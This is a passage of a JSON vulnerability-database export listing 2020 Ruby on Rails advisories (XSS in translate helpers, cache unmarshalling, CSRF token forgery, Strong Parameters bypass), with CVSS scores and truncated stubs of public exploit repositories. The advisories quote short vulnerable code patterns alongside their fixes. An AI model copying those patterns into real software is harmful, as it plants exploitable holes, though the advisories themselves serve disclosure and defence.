"AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-06-19T00:00:00", "id": "UB:CVE-2020-8165", "href": "https://ubuntu.com/security/CVE-2020-8165", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-06-29T14:11:20", "description": "A deserialization of untrusted data vulnerability exists in rails <\n5.2.4.3, rails < 6.0.3.1 which can allow an attacker to supply information\ncan be inadvertently leaked fromStrong Parameters.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8164", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2020-06-19T00:00:00", "id": "UB:CVE-2020-8164", "href": "https://ubuntu.com/security/CVE-2020-8164", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-06-29T14:10:45", "description": "A CSRF forgery vulnerability exists in rails < 5.2.5, rails < 6.0.4 that\nmakes it possible for an attacker to, given a global CSRF token such as the\none present in the authenticity_token meta tag, forge a per-form CSRF\ntoken.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-07-02T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8166", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2020-07-02T00:00:00", "id": "UB:CVE-2020-8166", "href": "https://ubuntu.com/security/CVE-2020-8166", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-06-28T13:47:40", "description": "A CSRF vulnerability exists in rails <= 6.0.3 rails-ujs module that could\nallow attackers to send CSRF tokens to wrong domains.\n\n#### Notes\n\nAuthor| Note \n---|--- \n[seth-arnold](<https://launchpad.net/~seth-arnold>) | In Oneiric-Saucy, rails package is just for transition; The rails package contains actual code from vivid onward\n", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-06-19T00:00:00", "type": "ubuntucve", "title": "CVE-2020-8167", "bulletinFamily": "info", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8167"], "modified": "2020-06-19T00:00:00", "id": "UB:CVE-2020-8167", "href": "https://ubuntu.com/security/CVE-2020-8167", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "github": [{"lastseen": "2023-06-06T15:20:24", "description": "There is a potential Cross-Site Scripting (XSS) vulnerability in Action View's translation helpers. Views that allow the user to control the default (not found) value of the `t` and `translate` helpers could be susceptible to XSS attacks.\n\n### Impact\n\nWhen an HTML-unsafe string is passed as the default for a missing translation key [named `html` or ending in `_html`](https://guides.rubyonrails.org/i18n.html#using-safe-html-translations), the default string is incorrectly marked as HTML-safe and not escaped. Vulnerable code may look like the following examples:\n\n```erb\n<%# The welcome_html translation is not defined for the current locale: %>\n<%= t(\"welcome_html\", default: untrusted_user_controlled_string) %>\n\n<%# Neither the title.html translation nor the missing.html translation is defined for the current locale: %>\n<%= t(\"title.html\", default: [:\"missing.html\", untrusted_user_controlled_string]) %>\n```\n\n### Patches\n\nPatched Rails versions, 6.0.3.3 and 5.2.4.4, are available from the normal locations.\n\nThe patches have also been applied to the `master`, `6-0-stable`, and `5-2-stable` branches on GitHub. If you track any of these branches, you should update to the latest.\n\nTo aid users who aren\u2019t able to upgrade immediately, we\u2019ve provided patches for the two supported release series. They are in git-am format and consist of a single changeset.\n\n* [5-2-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-5-2-translate-helper-xss-patch) \u2014 patch for the 5.2 release series\n* [6-0-translate-helper-xss.patch](https://gist.github.com/georgeclaghorn/a466e103922ee81f24c32c9034089442#file-6-0-translate-helper-xss-patch) \u2014 patch for the 6.0 release series\n\nPlease note that only the 5.2 and 6.0 release series are currently supported. Users of earlier, unsupported releases are advised to update as soon as possible, as we cannot provide security fixes for unsupported releases.\n\n### Workarounds\n\nImpacted users who can\u2019t upgrade to a patched Rails version can avoid this issue by manually escaping default translations with the `html_escape` helper (aliased as `h`):\n\n```erb\n<%= t(\"welcome_html\", default: h(untrusted_user_controlled_string)) %>\n```", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 6.1, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 2.7}, "published": "2020-09-11T15:19:57", "type": "github", "title": "XSS in Action View", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2023-05-04T19:48:02", "id": "GHSA-CFJV-5498-MPH5", "href": "https://github.com/advisories/GHSA-cfjv-5498-mph5", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-17T06:16:51", "description": "It is possible to, given a global CSRF token such as the one present in the authenticity_token meta tag, forge a per-form CSRF token for any action for that session.\n\nImpact\n------\n\nGiven the ability to extract the global CSRF token, an attacker would be able to construct a per-form CSRF token for that session.\n\nWorkarounds\n-----------\n\nThis is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "privilegesRequired": "NONE", "baseScore": 4.3, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:L/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 1.4}, "published": "2020-05-26T15:11:13", "type": "github", "title": "Ability to forge per-form CSRF tokens in Rails", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8166"], "modified": "2023-08-17T05:01:53", "id": "GHSA-JP5V-5GX4-JMJ9", "href": "https://github.com/advisories/GHSA-jp5v-5gx4-jmj9", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-07-05T20:16:25", "description": "There is a vulnerability in ActiveStorage's S3 adapter that allows the Content-Length of a direct file upload to be modified by an end user.\n\nVersions Affected: rails < 5.2.4.2, rails < 6.0.3.1\nNot affected: Applications that do not use the direct upload functionality of the ActiveStorage S3 adapter.\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n\nImpact\n------\n\nUtilizing this vulnerability, an attacker can control the Content-Length of an S3 direct upload URL without receiving a new signature from the server. This could be used to bypass controls in place on the server to limit upload size.\n\nWorkarounds\n-----------\n\nThis is a low-severity security issue. As such, no workaround is necessarily until such time as the application can be upgraded.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-26T15:09:48", "type": "github", "title": "Circumvention of file size limits in ActiveStorage", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8162"], "modified": "2023-07-05T19:19:31", "id": "GHSA-M42X-37P3-FV5W", "href": "https://github.com/advisories/GHSA-m42x-37p3-fv5w", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:N/I:P/A:N"}}, {"lastseen": "2023-08-17T06:16:51", "description": "In ActiveSupport, there is potentially unexpected behaviour in the MemCacheStore and RedisCacheStore where, when\nuntrusted user input is written to the cache store using the `raw: true` parameter, re-reading the result\nfrom the cache can evaluate the user input as a Marshalled object instead of plain text. Vulnerable code looks like:\n\n```\ndata = cache.fetch(\"demo\", raw: true) { untrusted_string }\n```\nVersions Affected: rails < 5.2.5, rails < 6.0.4\nNot affected: Applications not using MemCacheStore or RedisCacheStore. Applications that do not use the `raw` option when storing untrusted user input.\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n \nImpact\n------\nUnmarshalling of untrusted user input can have impact up to and including RCE. At a minimum,\nthis vulnerability allows an attacker to inject untrusted Ruby objects into a web application.\nIn addition to upgrading to the latest versions of Rails, developers should ensure that whenever\nthey are calling `Rails.cache.fetch` they are using consistent values of the `raw` parameter for both\nreading and writing, especially in the case of the RedisCacheStore which does not, prior to these changes,\ndetect if data was serialized using the raw option upon deserialization.\n\nWorkarounds\n-----------\nIt is recommended that application developers apply the suggested patch or upgrade to the latest release as\nsoon as possible. If this is not possible, we recommend ensuring that all user-provided strings cached using\nthe `raw` argument should be double-checked to ensure that they conform to the expected format.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-26T14:49:24", "type": "github", "title": "ActiveSupport potentially unintended unmarshalling of user-provided objects in MemCacheStore and RedisCacheStore", "bulletinFamily": "software", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2023-08-17T05:02:05", "id": "GHSA-2P68-F74V-9WC6", "href": "https://github.com/advisories/GHSA-2p68-f74v-9wc6", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2023-08-17T06:16:51", "description": "There is a strong parameters bypass vector in ActionPack.\n\nVersions Affected: rails <= 6.0.3\nNot affected: rails < 4.0.0\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n\nImpact\n------\nIn some cases user supplied information can be inadvertently leaked from\nStrong Parameters. Specifically the return value of `each`, or `each_value`,\nor `each_pair` will return the underlying \"untrusted\" hash of data that was\nread from the parameters. Applications that use this return value may be\ninadvertently use untrusted user input.\n\nImpacted code will look something like this:\n\n```\ndef update\n # Attacker has included the parameter: `{ is_admin: true }`\n User.update(clean_up_params)\nend\n\ndef clean_up_params\n params.each { |k, v| SomeModel.check(v) if k == :name }\nend\n```\n\nNote the mistaken use of `each` in the `clean_up_params` method in the above\nexample.\n\nWorkarounds\n-----------\nDo not use the return values of `each`, `each_value`, or `each_pair` in your\napplication.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "NONE", "privilegesRequired": "NONE", "baseScore": 7.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 3.6}, "published": "2020-05-26T15:09:16", "type": "github", "title": "Possible Strong Parameters Bypass in ActionPack", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "NONE", "integrityImpact": "NONE", "baseScore": 5.0, "vectorString": "AV:N/AC:L/Au:N/C:P/I:N/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8164"], "modified": "2023-08-17T05:01:38", "id": "GHSA-8727-M6GJ-MC37", "href": "https://github.com/advisories/GHSA-8727-m6gj-mc37", "cvss": {"score": 5.0, "vector": "AV:N/AC:L/Au:N/C:P/I:N/A:N"}}, {"lastseen": "2023-08-17T06:16:39", "description": "There is a vulnerability in rails-ujs that allows attackers to send CSRF tokens to wrong domains.\n\nVersions Affected: rails <= 6.0.3\nNot affected: Applications which don't use rails-ujs.\nFixed Versions: rails >= 5.2.4.3, rails >= 6.0.3.1\n\nImpact\n------\n\nThis is a regression of CVE-2015-1840.\n\nIn the scenario where an attacker might be able to control the href attribute of an anchor tag or the action attribute of a form tag that will trigger a POST action, the attacker can set the href or action to a cross-origin URL, and the CSRF token will be sent.\n\nWorkarounds\n-----------\n\nTo work around this problem, change code that allows users to control the href attribute of an anchor tag or the action attribute of a form tag to filter the user parameters.\n\nFor example, code like this:\n\n link_to params\n\nto code like this:\n\n link_to filtered_params\n\n def filtered_params\n # Filter just the parameters that you trust\n end", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "NONE", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 6.5, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:H/A:N", "version": "3.1", "userInteraction": "REQUIRED"}, "impactScore": 3.6}, "published": "2020-07-07T16:34:10", "type": "github", "title": "CSRF Vulnerability in rails-ujs", "bulletinFamily": "software", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 2.9, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2015-1840", "CVE-2020-8167"], "modified": "2023-08-17T05:01:53", "id": "GHSA-XQ5J-GW7F-JGJ8", "href": "https://github.com/advisories/GHSA-xq5j-gw7f-jgj8", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}}], "githubexploit": [{"lastseen": "2021-12-10T14:53:45", "description": "# README\n\nThis README would normally document whatever steps are...", "cvss3": {"exploitabilityScore": 2.8, "cvssV3": {"baseSeverity": "MEDIUM", "confidentialityImpact": "LOW", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "NONE", "integrityImpact": "LOW", "baseScore": 6.1, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N", "userInteraction": "REQUIRED", "version": "3.1"}, "impactScore": 2.7}, "published": "2020-10-08T15:42:37", "type": "githubexploit", "title": "Exploit for Cross-site Scripting in Action View Project Action View", "bulletinFamily": "exploit", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "NONE", "availabilityImpact": "NONE", "integrityImpact": "PARTIAL", "baseScore": 4.3, "vectorString": "AV:N/AC:M/Au:N/C:N/I:P/A:N", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 2.9, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-15169"], "modified": "2020-10-08T15:43:15", "id": "1B4B2D33-DA2D-5E3F-A1A6-FC5997A7558C", "href": "", "cvss": {"score": 4.3, "vector": "AV:N/AC:M/Au:N/C:N/I:P/A:N"}, "privateArea": 1}, {"lastseen": "2022-07-20T16:42:30", "description": "## CVE-2020-8165 (Ruby on Rails)\n\nFor educational purposes only....", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-05-20T04:27:52", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2022-07-20T11:42:00", "id": "27155F58-3ADE-564B-A3AA-579D94D79DAE", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:51:25", "description": "# README\n\nThis README would normally document whatever steps are...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T07:31:21", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2022-02-05T06:36:17", "id": "CECC5D54-6258-568A-858F-9209E5656C0D", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:52:46", "description": "# CVE-2020-8165.py\n\nA shell for CVE-2020-8...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-15T04:40:24", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2021-01-15T04:44:41", "id": "78840956-5A47-5CE4-8509-122957977EAB", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:53:45", "description": "# CVE-2020-8165 Python Exploit\n\nThis is code to exploit CVE-2020...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-01-03T21:59:09", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2021-02-03T02:11:09", "id": "60737735-B0CC-556A-96EB-B41ED58C507B", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:54:00", "description": "# CVE-2020-8165\n\nI real...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2020-12-25T20:07:27", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2020-8165"], "modified": "2020-12-25T20:09:05", "id": "DA85122C-5559-534B-9447-C9C43A4CBB65", "href": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}, "privateArea": 1}, {"lastseen": "2022-03-23T23:55:19", "description": "# CVE-2020-8165 Demo\n\nYet another demo of CVE-2020-8165, though ...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 9.8, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 5.9}, "published": "2021-02-14T06:57:30", "type": "githubexploit", "title": "Exploit for Deserialization of Untrusted Data in Rubyonrails Rails", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", 